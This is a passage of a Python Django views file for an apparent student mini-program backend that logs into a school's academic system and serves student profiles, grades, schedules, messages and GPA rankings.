lgn.login_kaptcha(storage["cookies"],xh, pswd,storage["tokens"],storage["n"],storage["e"],kaptcha)
else:
lgn.login(xh, pswd)
if lgn.runcode == 1:
cookies = lgn.cookies
JSESSIONID = requests.utils.dict_from_cookiejar(cookies)["JSESSIONID"]
if myconfig.isKaptcha:
route = storage["cookies"]["route"]
else:
route = requests.utils.dict_from_cookiejar(cookies)["route"]
ncookies = requests.utils.cookiejar_from_dict({"JSESSIONID":JSESSIONID,"route":route})
person = GetInfo(base_url=base_url, cookies=ncookies)
pinfo = person.get_pinfo()
if pinfo.get("idNumber")[-6:] == pswd:
return HttpResponse(json.dumps({'err':"新生或专升本同学请在教务系统(jwxt.xcc.edu.cn)完善信息并审核且修改密码后登陆小程序!"}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
if pinfo.get('err'):
if pinfo.get('err') == "Connect Timeout":
return mywarn("登录超时","",xh,pswd)
else:
return pinfo
updateTime = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
newstu = Students.create(int(pinfo["studentId"]), pinfo["name"], calSex(pinfo["idNumber"]), pinfo["collegeName"],
pinfo["majorName"], pinfo["className"], pinfo["phoneNumber"],
pinfo["birthDay"], pinfo["graduationSchool"], pinfo["domicile"],
pinfo["email"], pinfo["national"], pinfo["idNumber"],
JSESSIONID, route, updateTime)
newstu.save()
endTime = time.time()
spendTime = endTime - startTime
print('【%s】第一次登录' % pinfo["name"])
content = ('【%s】[%s]第一次登录,耗时%.2fs' % (
datetime.datetime.now().strftime('%H:%M:%S'), pinfo["name"], spendTime))
writeLog(content)
filename = ('Pinfo')
newData(xh, filename, json.dumps(pinfo, ensure_ascii=False))
return HttpResponse(json.dumps(pinfo, ensure_ascii=False),
content_type="application/json,charset=utf-8")
elif lgn.runcode == 4:
return HttpResponse(json.dumps({'err':'验证码错误'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
elif lgn.runcode == 2:
content = ('【%s】[%s]在第一次登录时学号或者密码错误!' % (datetime.datetime.now().strftime('%H:%M:%S'), xh))
writeLog(content)
return HttpResponse(json.dumps({'err':'学号或者密码错误'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
else:
content = ('【%s】[%s]在第一次登录时网络或其它错误!' % (datetime.datetime.now().strftime('%H:%M:%S'), xh))
writeLog(content)
return HttpResponse(json.dumps({'err':'网络或token问题,请返回重试'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
except Exception as e:
# print(e)
if "Connection broken" in str(e) or 'ECONNRESET' in str(e):
# return get_pinfo(request)
return HttpResponse(json.dumps({'err':"请重新刷新一下"}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
else:
content = ('【%s】[%s]第一次登录时出错' % (datetime.datetime.now().strftime('%H:%M:%S'), xh))
writeLog(content)
if str(e) == "'NoneType' object has no attribute 'get'":
return HttpResponse(json.dumps({'err':'教务系统挂掉了,请等待修复后重试~'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
traceback.print_exc()
return mywarn("登录未知错误",str(e),xh,pswd)
else:
return HttpResponse(json.dumps({'err':'请使用post并提交正确数据'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
def refresh_class(request):
myconfig = Config.objects.all().first()
if myconfig.apichange:
data = {
'xh':request.POST.get("xh"),
'pswd':request.POST.get("pswd")
}
res = requests.post(url=myconfig.otherapi+"/info/refreshclass",data=data)
return HttpResponse(json.dumps(json.loads(res.text), ensure_ascii=False),
content_type="application/json,charset=utf-8")
if myconfig.maintenance:
return HttpResponse(json.dumps({'err':'教务系统出错维护中,请静待教务系统恢复正常!'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
# if mpconfig["loginbad"]:
# return HttpResponse(json.dumps({'err':'当前教务系统无法请求登录,请待学校修复!'}, ensure_ascii=False),
# content_type="application/json,charset=utf-8")
if request.method == 'POST':
if request.POST:
xh = request.POST.get("xh")
pswd = request.POST.get("pswd")
else:
return HttpResponse(json.dumps({'err':'请提交正确的post数据'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
if not Students.objects.filter(studentId=int(xh)):
content = ('【%s】[%s]未登录更新班级信息' % (datetime.datetime.now().strftime('%H:%M:%S'), xh))
writeLog(content)
return HttpResponse(json.dumps({'err':'还未登录,请重新登录!'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
else:
stu = Students.objects.get(studentId=int(xh))
try:
startTime = time.time()
print('【%s】更新了班级信息' % stu.name)
JSESSIONID = str(stu.JSESSIONID)
route = str(stu.route)
cookies_dict = {
'JSESSIONID': JSESSIONID,
'route': route
}
cookies = requests.utils.cookiejar_from_dict(cookies_dict)
person = GetInfo(base_url=base_url, cookies=cookies)
nowClass = person.get_now_class()
try:
if nowClass.get('err'):
if nowClass.get('err') == "Connect Timeout":
return mywarn("更新班级超时","",xh,pswd)
except:
pass
if stu.className == nowClass:
return HttpResponse(json.dumps({'err':"你的班级并未发生变化~"}, ensure_ascii=False), content_type="application/json,charset=utf-8")
Students.objects.filter(studentId=int(xh)).update(className=nowClass)
endTime = time.time()
spendTime = endTime - startTime
content = ('【%s】[%s]更新了班级信息,耗时%.2fs' % (datetime.datetime.now().strftime('%H:%M:%S'), stu.name, spendTime))
writeLog(content)
return HttpResponse(json.dumps({'success':"你已成功变更到【"+ nowClass + "】!",'class':nowClass}, ensure_ascii=False), content_type="application/json,charset=utf-8")
except Exception as e:
content = ('【%s】[%s]更新班级信息出错' % (datetime.datetime.now().strftime('%H:%M:%S'), stu.name))
writeLog(content)
if str(e) == "'NoneType' object has no attribute 'get'":
return HttpResponse(json.dumps({'err':'教务系统挂掉了,请等待修复后重试~'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
if "Connection broken" in str(e) or 'ECONNRESET' in str(e):
return refresh_class(request)
if 'Expecting value' not in str(e):
traceback.print_exc()
return mywarn("更新班级错误",str(e),xh,pswd)
if myconfig.isKaptcha:
return get_kaptcha(xh)
else:
sta = update_cookies(request)
person = GetInfo(base_url=base_url, cookies=sta)
nowClass = person.get_now_class()
if stu.className == nowClass:
return HttpResponse(json.dumps({'err':"你的班级并未发生变化~"}, ensure_ascii=False), content_type="application/json,charset=utf-8")
Students.objects.filter(studentId=int(xh)).update(className=nowClass)
return HttpResponse(json.dumps({'success':"你已成功变更到【"+ nowClass + "】!",'class':nowClass}, ensure_ascii=False), content_type="application/json,charset=utf-8")
else:
return HttpResponse(json.dumps({'err':'请使用post并提交正确数据'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
def get_message(request):
myconfig = Config.objects.all().first()
if myconfig.apichange:
data = {
'xh':request.POST.get("xh"),
'pswd':request.POST.get("pswd")
}
res = requests.post(url=myconfig.otherapi+"/info/message",data=data)
return HttpResponse(json.dumps(json.loads(res.text), ensure_ascii=False),
content_type="application/json,charset=utf-8")
if myconfig.maintenance:
return HttpResponse(json.dumps({'err':'教务系统出错维护中,请静待教务系统恢复正常!'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
# if mpconfig["jwxtbad"]:
# return HttpResponse(json.dumps({'err':'当前教务系统无法访问(可能是学校机房断电或断网所致),小程序暂时无法登录和更新,请待学校修复!'}, ensure_ascii=False),
# content_type="application/json,charset=utf-8")
if request.method == 'POST':
if request.POST:
xh = request.POST.get("xh")
pswd = request.POST.get("pswd")
else:
return HttpResponse(json.dumps({'err':'请提交正确的post数据'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
if not Students.objects.filter(studentId=int(xh)):
content = ('【%s】[%s]未登录访问消息' % (datetime.datetime.now().strftime('%H:%M:%S'), xh))
writeLog(content)
return HttpResponse(json.dumps({'err':'还未登录,请重新登录!'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
else:
stu = Students.objects.get(studentId=int(xh))
try:
startTime = time.time()
# print('【%s】查看了消息' % stu.name)
JSESSIONID = str(stu.JSESSIONID)
route = str(stu.route)
cookies_dict = {
'JSESSIONID': JSESSIONID,
'route': route
}
cookies = requests.utils.cookiejar_from_dict(cookies_dict)
person = GetInfo(base_url=base_url, cookies=cookies)
message = person.get_message()
endTime = time.time()
spendTime = endTime - startTime
# content = ('【%s】[%s]访问了消息,耗时%.2fs' % (datetime.datetime.now().strftime('%H:%M:%S'), stu.name, spendTime))
# writeLog(content)
return HttpResponse(json.dumps(message, ensure_ascii=False), content_type="application/json,charset=utf-8")
except Exception as e:
if "Connection broken" in str(e) or 'ECONNRESET' in str(e):
# return get_message(request)
return HttpResponse(json.dumps({'err':"请重新刷新一下"}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
else:
content = ('【%s】[%s]访问消息出错' % (datetime.datetime.now().strftime('%H:%M:%S'), stu.name))
writeLog(content)
if str(e) == 'Expecting value: line 1 column 1 (char 0)':
return HttpResponse(json.dumps({'err':'教务系统挂掉了,请等待修复后重试~'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
if str(e) != 'Expecting value: line 6 column 1 (char 11)':
traceback.print_exc()
return mywarn("消息请求错误",str(e),xh,pswd)
if myconfig.isKaptcha:
return get_kaptcha(xh)
else:
sta = update_cookies(request)
person = GetInfo(base_url=base_url, cookies=sta)
message = person.get_message()
return HttpResponse(json.dumps(message, ensure_ascii=False), content_type="application/json,charset=utf-8")
else:
return HttpResponse(json.dumps({'err':'请使用post并提交正确数据'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
def get_study(request):
myconfig = Config.objects.all().first()
if myconfig.apichange:
data = {
'xh':request.POST.get("xh"),
'pswd':request.POST.get("pswd"),
'refresh':request.POST.get("refresh")
}
res = requests.post(url=myconfig.otherapi+"/info/study",data=data)
return HttpResponse(json.dumps(json.loads(res.text), ensure_ascii=False),
content_type="application/json,charset=utf-8")
if myconfig.maintenance:
return HttpResponse(json.dumps({'err':'教务系统出错维护中,请静待教务系统恢复正常!'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
# if mpconfig["studybad"]:
# return HttpResponse(json.dumps({'err':'当前教务系统无法请求学业,请待学校修复!'}, ensure_ascii=False),
# content_type="application/json,charset=utf-8")
if request.method == 'POST':
if request.POST:
xh = request.POST.get("xh")
pswd = request.POST.get("pswd")
refresh = request.POST.get("refresh")
else:
return HttpResponse(json.dumps({'err':'请提交正确的post数据'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
if not Students.objects.filter(studentId=int(xh)):
content = ('【%s】[%s]未登录访问学业情况' % (datetime.datetime.now().strftime('%H:%M:%S'), xh))
writeLog(content)
return HttpResponse(json.dumps({'err':'还未登录,请重新登录!'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
else:
stu = Students.objects.get(studentId=int(xh))
if refresh == "no":
filename = ('Study')
cache = cacheData(xh, filename)
if cache is not None:
# print('cache')
print('【%s】查看了学业缓存' % stu.name)
return HttpResponse(json.dumps(cache, ensure_ascii=False),
content_type="application/json,charset=utf-8")
else:
pass
try:
startTime = time.time()
print('【%s】查看了学业情况' % stu.name)
JSESSIONID = str(stu.JSESSIONID)
route = str(stu.route)
cookies_dict = {
'JSESSIONID': JSESSIONID,
'route': route
}
cookies = requests.utils.cookiejar_from_dict(cookies_dict)
person = GetInfo(base_url=base_url, cookies=cookies)
study = person.get_study(xh)
if study.get("err") == 'Connect Timeout':
if myconfig.isKaptcha:
return get_kaptcha(xh)
else:
sta = update_cookies(request)
person = GetInfo(base_url=base_url, cookies=sta)
study = person.get_study(xh)
gpa = str(study["gpa"]) if str(study["gpa"]) !="" or str(study["gpa"]) is not None else "init"
Students.objects.filter(studentId=int(xh)).update(gpa=gpa)
filename = ('Study')
newData(xh, filename, json.dumps(study, ensure_ascii=False))
return HttpResponse(json.dumps(study, ensure_ascii=False),
content_type="application/json,charset=utf-8")
endTime = time.time()
spendTime = endTime - startTime
content = ('【%s】[%s]访问了学业情况,耗时%.2fs' % (datetime.datetime.now().strftime('%H:%M:%S'), stu.name, spendTime))
writeLog(content)
gpa = str(study["gpa"]) if str(study["gpa"]) !="" or str(study["gpa"]) is not None else "init"
Students.objects.filter(studentId=int(xh)).update(gpa=gpa)
filename = ('Study')
newData(xh, filename, json.dumps(study, ensure_ascii=False))
return HttpResponse(json.dumps(study, ensure_ascii=False), content_type="application/json,charset=utf-8")
except Exception as e:
if "Connection broken" in str(e) or 'ECONNRESET' in str(e):
# return get_study(request)
return HttpResponse(json.dumps({'err':'更新出现问题,请待教务系统修复'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
elif "list index out of range" in str(e) and int(xh[0:2]) >= int(myconfig.nGrade[2:4]):
return HttpResponse(json.dumps({'err':'暂无学业信息或请先刷新“我的成绩”后访问'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
else:
content = ('【%s】[%s]访问学业情况出错' % (datetime.datetime.now().strftime('%H:%M:%S'), stu.name))
writeLog(content)
if str(e) != 'list index out of range':
traceback.print_exc()
return mywarn("学业请求错误",str(e),xh,pswd)
if myconfig.isKaptcha:
return get_kaptcha(xh)
else:
sta = update_cookies(request)
person = GetInfo(base_url=base_url, cookies=sta)
study = person.get_study(xh)
gpa = str(study["gpa"]) if str(study["gpa"]) !="" or str(study["gpa"]) is not None else "init"
Students.objects.filter(studentId=int(xh)).update(gpa=gpa)
filename = ('Study')
newData(xh, filename, json.dumps(study, ensure_ascii=False))
return HttpResponse(json.dumps(study, ensure_ascii=False), content_type="application/json,charset=utf-8")
else:
return HttpResponse(json.dumps({'err':'请使用post并提交正确数据'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
def get_grade(request):
myconfig = Config.objects.all().first()
if myconfig.apichange:
data = {
'xh':request.POST.get("xh"),
'pswd':request.POST.get("pswd"),
'year':request.POST.get("year"),
'term':request.POST.get("term"),
'refresh':request.POST.get("refresh")
}
res = requests.post(url=myconfig.otherapi,data=data)
return HttpResponse(json.dumps(json.loads(res.text), ensure_ascii=False),
content_type="application/json,charset=utf-8")
if myconfig.maintenance:
return HttpResponse(json.dumps({'err':'教务系统出错维护中,请静待教务系统恢复正常!'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
# if mpconfig["gradebad"]:
# return HttpResponse(json.dumps({'err':'当前教务系统无法请求成绩,请待学校修复!'}, ensure_ascii=False),
# content_type="application/json,charset=utf-8")
if request.method == 'POST':
if request.POST:
xh = request.POST.get("xh")
pswd = request.POST.get("pswd")
year = request.POST.get("year")
term = request.POST.get("term")
refresh = request.POST.get("refresh")
else:
return HttpResponse(json.dumps({'err':'请提交正确的post数据'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
if not Students.objects.filter(studentId=int(xh)):
content = ('【%s】[%s]未登录访问成绩' % (datetime.datetime.now().strftime('%H:%M:%S'), xh))
writeLog(content)
return HttpResponse(json.dumps({'err':'还未登录,请重新登录!'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
else:
stu = Students.objects.get(studentId=int(xh))
if refresh == "no":
filename = ('Grades-%s%s' % (str(year), str(term)))
cache = cacheData(xh, filename)
if cache is not None:
# print('cache')
def isLast(ny,nt,y,t):
ny = (myconfig.nGrade)[0:4]
nt = (myconfig.nGrade)[4:5]
if str(year) == ny:
pass
else:
if int(nt)-1 == 0 and int(term)==2:
pass
else:
print('【%s】查看了%s-%s的成绩缓存' % (stu.name, year, term))
return HttpResponse(json.dumps(cache, ensure_ascii=False),
content_type="application/json,charset=utf-8")
else:
pass
try:
startTime = time.time()
print('【%s】查看了%s-%s的成绩' % (stu.name, year, term))
JSESSIONID = str(stu.JSESSIONID)
route = str(stu.route)
cookies_dict = {
'JSESSIONID': JSESSIONID,
'route': route
}
cookies = requests.utils.cookiejar_from_dict(cookies_dict)
person = GetInfo(base_url=base_url, cookies=cookies)
grade = person.get_grade(year, term)
if grade.get("err"):
if grade.get("err") == "Connect Timeout":
# update_cookies(xh, pswd)
# return mywarn("成绩超时","",xh,pswd)
return get_kaptcha(xh)
elif grade.get("err") == "No Data":
if int(xh[0:2]) > int(myconfig.nGrade[2:4]):
return HttpResponse(json.dumps({'err':"当前你还没有任何成绩信息"}, ensure_ascii=False), content_type="application/json,charset=utf-8")
else:
return HttpResponse(json.dumps({'err':"还没有" + year+"-"+term + "学期的成绩,点击顶栏也看看以前的吧~"}, ensure_ascii=False), content_type="application/json,charset=utf-8")
elif grade.get("err") == "Error Term":
return HttpResponse(json.dumps({'err':"网络问题,请重新访问请求课程"}, ensure_ascii=False), content_type="application/json,charset=utf-8")
Students.objects.filter(studentId=int(xh)).update(gpa = grade.get("gpa") if grade.get("gpa")!="" or grade.get("gpa") is not None else "init")
endTime = time.time()
spendTime = endTime - startTime
content = ('【%s】[%s]访问了%s-%s的成绩,耗时%.2fs' % (
datetime.datetime.now().strftime('%H:%M:%S'), stu.name, year, term, spendTime))
writeLog(content)
filename = ('Grades-%s%s' % (str(year), str(term)))
newData(xh, filename, json.dumps(grade, ensure_ascii=False))
# print('write')
return HttpResponse(json.dumps(grade, ensure_ascii=False), content_type="application/json,charset=utf-8")
except Exception as e:
# print(e)
if "Connection broken" in str(e) or 'ECONNRESET' in str(e):
# return get_grade(request)
return HttpResponse(json.dumps({'err':"请重新刷新一下"}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
else:
content = ('【%s】[%s]访问成绩出错' % (datetime.datetime.now().strftime('%H:%M:%S'), stu.name))
writeLog(content)
if str(e) == 'Expecting value: line 1 column 1 (char 0)':
return HttpResponse(json.dumps({'err':'教务系统挂掉了,请等待修复后重试~'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
if str(e) != 'Expecting value: line 3 column 1 (char 4)':
traceback.print_exc()
return mywarn("成绩请求错误",str(e),xh,pswd)
if myconfig.isKaptcha:
return get_kaptcha(xh)
else:
sta = update_cookies(request)
person = GetInfo(base_url=base_url, cookies=sta)
grade = person.get_grade(year, term)
if grade.get("gpa") == "" or grade.get("gpa") is None:
return HttpResponse(json.dumps({'err':'平均学分绩点获取失败,请重试~'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
Students.objects.filter(studentId=int(xh)).update(gpa = grade.get("gpa"))
filename = ('Grades-%s%s' % (str(year), str(term)))
newData(xh, filename, json.dumps(grade, ensure_ascii=False))
return HttpResponse(json.dumps(grade, ensure_ascii=False), content_type="application/json,charset=utf-8")
else:
return HttpResponse(json.dumps({'err':'请使用post并提交正确数据'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
# def get_grade2(request):
# myconfig = Config.objects.all().first()
# if myconfig.apichange:
# data = {
# 'xh':request.POST.get("xh"),
# 'pswd':request.POST.get("pswd"),
# 'year':request.POST.get("year"),
# 'term':request.POST.get("term"),
# 'refresh':request.POST.get("refresh")
# }
# res = requests.post(url=myconfig.otherapi+"/info/grade",data=data)
# return HttpResponse(json.dumps(json.loads(res.text), ensure_ascii=False),
# content_type="application/json,charset=utf-8")
# if myconfig.maintenance:
# return HttpResponse(json.dumps({'err':'教务系统出错维护中,请静待教务系统恢复正常!'}, ensure_ascii=False),
# content_type="application/json,charset=utf-8")
# # if mpconfig["gradebad"]:
# # return HttpResponse(json.dumps({'err':'当前教务系统无法请求成绩,请待学校修复!'}, ensure_ascii=False),
# # content_type="application/json,charset=utf-8")
# if request.method == 'POST':
# if request.POST:
# xh = request.POST.get("xh")
# pswd = request.POST.get("pswd")
# year = request.POST.get("year")
# term = request.POST.get("term")
# refresh = request.POST.get("refresh")
# else:
# return HttpResponse(json.dumps({'err':'请提交正确的post数据'}, ensure_ascii=False),
# content_type="application/json,charset=utf-8")
# if not Students.objects.filter(studentId=int(xh)):
# content = ('【%s】[%s]未登录访问成绩' % (datetime.datetime.now().strftime('%H:%M:%S'), xh))
# writeLog(content)
# return HttpResponse(json.dumps({'err':'还未登录,请重新登录!'}, ensure_ascii=False),
# content_type="application/json,charset=utf-8")
# else:
# stu = Students.objects.get(studentId=int(xh))
# if refresh == "no":
# filename = ('GradesN-%s%s' % (str(year), str(term)))
# cache = cacheData(xh, filename)
# if cache is not None:
# # print('cache')
# print('【%s】查看了%s-%s的成绩缓存' % (stu.name, year, term))
# return HttpResponse(json.dumps(cache, ensure_ascii=False),
# content_type="application/json,charset=utf-8")
# else:
# pass
# try:
# startTime = time.time()
# print('【%s】查看了%s-%s的成绩' % (stu.name, year, term))
# JSESSIONID = str(stu.JSESSIONID)
# route = str(stu.route)
# cookies_dict = {
# 'JSESSIONID': JSESSIONID,
# 'route': route
# }
# cookies = requests.utils.cookiejar_from_dict(cookies_dict)
# person = GetInfo(base_url=base_url, cookies=cookies)
# grade = person.get_grade2(year, term)
# if grade.get("err") == "请求超时,鉴于教务系统特色,已帮你尝试重新登录,重试几次,还不行请麻烦你自行重新登录,或者在关于里面反馈!当然,也可能是教务系统挂了~":
# update_cookies(xh, pswd)
# return HttpResponse(json.dumps({'err':grade.get("err")}, ensure_ascii=False), content_type="application/json,charset=utf-8")
# if grade.get("err") == "看起来你这学期好像还没有出成绩,点击顶栏也看看以前的吧~":
# return HttpResponse(json.dumps({'err':grade.get("err")}, ensure_ascii=False), content_type="application/json,charset=utf-8")
# Students.objects.filter(studentId=int(xh)).update(gpa = grade.get("gpa"))
# endTime = time.time()
# spendTime = endTime - startTime
# content = ('【%s】[%s]访问了%s-%s的成绩,耗时%.2fs' % (
# datetime.datetime.now().strftime('%H:%M:%S'), stu.name, year, term, spendTime))
# writeLog(content)
# filename = ('GradesN-%s%s' % (str(year), str(term)))
# newData(xh, filename, json.dumps(grade, ensure_ascii=False))
# # print('write')
# return HttpResponse(json.dumps(grade, ensure_ascii=False), content_type="application/json,charset=utf-8")
# except Exception as e:
# # print(e)
# if "Connection broken" in str(e) or 'ECONNRESET' in str(e):
# # return get_grade2(request)
# return HttpResponse(json.dumps({'err':'更新出现问题,请待教务系统修复'}, ensure_ascii=False),
# content_type="application/json,charset=utf-8")
# else:
# content = ('【%s】[%s]访问成绩出错' % (datetime.datetime.now().strftime('%H:%M:%S'), stu.name))
# writeLog(content)
# if str(e) == 'Expecting value: line 1 column 1 (char 0)':
# return HttpResponse(json.dumps({'err':'教务系统挂掉了,请等待修复后重试~'}, ensure_ascii=False),
# content_type="application/json,charset=utf-8")
# if str(e) != 'Expecting value: line 3 column 1 (char 4)':
# traceback.print_exc()
# return mywarn("成绩请求错误",str(e),xh,pswd)
# sta = update_cookies(xh, pswd)
# person = GetInfo(base_url=base_url, cookies=sta)
# grade = person.get_grade2(year, term)
# if grade.get("gpa") == "" or grade.get("gpa") is None:
# return HttpResponse(json.dumps({'err':'平均学分绩点获取失败,请重试~'}, ensure_ascii=False),
# content_type="application/json,charset=utf-8")
# Students.objects.filter(studentId=int(xh)).update(gpa = grade.get("gpa"))
# filename = ('GradesN-%s%s' % (str(year), str(term)))
# newData(xh, filename, json.dumps(grade, ensure_ascii=False))
# return HttpResponse(json.dumps(grade, ensure_ascii=False), content_type="application/json,charset=utf-8")
# else:
# return HttpResponse(json.dumps({'err':'请使用post并提交正确数据'}, ensure_ascii=False),
# content_type="application/json,charset=utf-8")
def get_schedule(request):
myconfig = Config.objects.all().first()
if myconfig.apichange:
data = {
'xh':request.POST.get("xh"),
'pswd':request.POST.get("pswd"),
'year':request.POST.get("year"),
'term':request.POST.get("term"),
'refresh':request.POST.get("refresh")
}
res = requests.post(url=myconfig.otherapi+"/info/schedule",data=data)
return HttpResponse(json.dumps(json.loads(res.text), ensure_ascii=False),
content_type="application/json,charset=utf-8")
if myconfig.maintenance:
return HttpResponse(json.dumps({'err':'教务系统出错维护中,请静待教务系统恢复正常!'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
# if mpconfig["schedulebad"]:
# return HttpResponse(json.dumps({'err':'当前教务系统无法请求课表,请待学校修复!'}, ensure_ascii=False),
# content_type="application/json,charset=utf-8")
if request.method == 'POST':
if request.POST:
xh = request.POST.get("xh")
pswd = request.POST.get("pswd")
year = request.POST.get("year")
term = request.POST.get("term")
refresh = request.POST.get("refresh")
else:
return HttpResponse(json.dumps({'err':'请提交正确的post数据'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
if not Students.objects.filter(studentId=int(xh)):
content = ('【%s】[%s]未登录访问课程' % (datetime.datetime.now().strftime('%H:%M:%S'), xh))
writeLog(content)
return HttpResponse(json.dumps({'err':'还未登录,请重新登录!'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
else:
stu = Students.objects.get(studentId=int(xh))
if refresh == "no":
filename = ('Schedules-%s%s' % (str(year), str(term)))
cache = cacheData(xh, filename)
if cache is not None:
# print('cache')
print('【%s】查看了%s-%s的课表缓存' % (stu.name, year, term))
return HttpResponse(json.dumps(cache, ensure_ascii=False),
content_type="application/json,charset=utf-8")
else:
pass
try:
startTime = time.time()
print('【%s】查看了%s-%s的课程' % (stu.name, year, term))
JSESSIONID = str(stu.JSESSIONID)
route = str(stu.route)
cookies_dict = {
'JSESSIONID': JSESSIONID,
'route': route
}
cookies = requests.utils.cookiejar_from_dict(cookies_dict)
person = GetInfo(base_url=base_url, cookies=cookies)
schedule = person.get_schedule(year, term)
if schedule.get('err'):
if schedule.get('err') == "Connect Timeout":
return mywarn("更新课程超时","",xh,pswd)
elif schedule.get('err') == "Error Term":
return HttpResponse(json.dumps({'err':"网络问题,请重新访问请求课程"}, ensure_ascii=False), content_type="application/json,charset=utf-8")
endTime = time.time()
spendTime = endTime - startTime
content = ('【%s】[%s]访问了%s-%s的课程,耗时%.2fs' % (
datetime.datetime.now().strftime('%H:%M:%S'), stu.name, year, term, spendTime))
writeLog(content)
filename = ('Schedules-%s%s' % (str(year), str(term)))
newData(xh, filename, json.dumps(schedule, ensure_ascii=False))
# print('write')
return HttpResponse(json.dumps(schedule, ensure_ascii=False), content_type="application/json,charset=utf-8")
except Exception as e:
if "Connection broken" in str(e) or 'ECONNRESET' in str(e):
# return get_schedule(request)
return HttpResponse(json.dumps({'err':"请重新刷新一下"}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
else:
content = ('【%s】[%s]访问课程出错' % (datetime.datetime.now().strftime('%H:%M:%S'), stu.name))
writeLog(content)
if str(e) == 'Expecting value: line 1 column 1 (char 0)':
return HttpResponse(json.dumps({'err':'教务系统挂掉了,请等待修复后重试~'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
if str(e) != 'Expecting value: line 3 column 1 (char 4)':
traceback.print_exc()
return mywarn("课程请求错误",str(e),xh,pswd)
if myconfig.isKaptcha:
return get_kaptcha(xh)
else:
sta = update_cookies(request)
person = GetInfo(base_url=base_url, cookies=sta)
schedule = person.get_schedule(year, term)
filename = ('Schedules-%s%s' % (str(year), str(term)))
newData(xh, filename, json.dumps(schedule, ensure_ascii=False))
return HttpResponse(json.dumps(schedule, ensure_ascii=False), content_type="application/json,charset=utf-8")
else:
return HttpResponse(json.dumps({'err':'请使用post并提交正确数据'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
def joinDetail(request):
myconfig = Config.objects.all().first()
if myconfig.apichange:
res = requests.get(url=myconfig.otherapi+"/info/joindetail?type=" + request.GET.get("type"))
return HttpResponse(json.dumps(json.loads(res.text), ensure_ascii=False),
content_type="application/json,charset=utf-8")
type = request.GET.get("type")
allUsers = Students.objects.filter().all().count()
if type == 'college':
detail = [{
'collegeName': i["collegeName"],
'collegeNum': Students.objects.filter(collegeName=i["collegeName"]).count()
} for i in Students.objects.values('collegeName').distinct().order_by('collegeName')]
ndetail = sorted(detail,key=lambda keys:keys['collegeNum'], reverse=True)
res = {
'allUsers': allUsers,
'collegeNum': int(Students.objects.values('collegeName').distinct().order_by('collegeName').count()),
'detail': ndetail
}
elif type == 'major':
detail = [{
'majorName': i["majorName"],
'majorNum': Students.objects.filter(majorName=i["majorName"]).count()
} for i in Students.objects.values('majorName').distinct().order_by('majorName')]
ndetail = sorted(detail,key=lambda keys:keys['majorNum'], reverse=True)
res = {
'allUsers': allUsers,
'majorNum': int(Students.objects.values('majorName').distinct().order_by('majorName').count()),
'detail': ndetail
}
elif type == 'class':
detail = [{
'className': i["className"],
'classNum': Students.objects.filter(className=i["className"]).count()
} for i in Students.objects.values('className').distinct().order_by('className')]
ndetail = sorted(detail,key=lambda keys:keys['classNum'], reverse=True)
res = {
'allUsers': allUsers,
'classNum': int(Students.objects.values('className').distinct().order_by('className').count()),
'detail': ndetail
}
return HttpResponse(json.dumps(res, ensure_ascii=False),
content_type="application/json,charset=utf-8")
def get_position(request):
myconfig = Config.objects.all().first()
if myconfig.apichange:
res = requests.get(url=myconfig.otherapi+"/info/position?xh=" + request.GET.get("xh"))
return HttpResponse(json.dumps(json.loads(res.text), ensure_ascii=False),
content_type="application/json,charset=utf-8")
#print(request)
xh = request.GET.get("xh")
if xh is None:
return HttpResponse(json.dumps({'err':'参数不全'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
if not Students.objects.filter(studentId=int(xh)):
return HttpResponse(json.dumps({'err':'还未登录,请重新登录!'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
else:
stu = Students.objects.get(studentId=int(xh))
majorName = stu.majorName
className = stu.className
majorNum = Students.objects.filter(majorName=majorName,studentId__startswith=int(xh[0:2])).all().count()
classNum = Students.objects.filter(className=className).all().count()
if stu.gpa == "init":
gpa = "init"
return HttpResponse(json.dumps({'gpa': gpa,'majorCount':0,'classCount':0,'majorNum':majorNum,'classNum':classNum,'nMajorCount':"init",'nClassCount':"init"}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
else:
gpa = float(stu.gpa)
majorCount = 1
classCount = 1
nMajorCount = 0
nClassCount = 0
for m in Students.objects.filter(majorName=majorName).all().order_by('-gpa'):
if m.gpa == "init" and str(m.studentId)[0:2] == xh[0:2]:
nMajorCount += 1
elif m.gpa == "init" or str(m.studentId)[0:2] != xh[0:2]:
pass
elif gpa >= float(m.gpa):
break
else:
majorCount += 1
for c in Students.objects.filter(className=className).all().order_by('-gpa'):
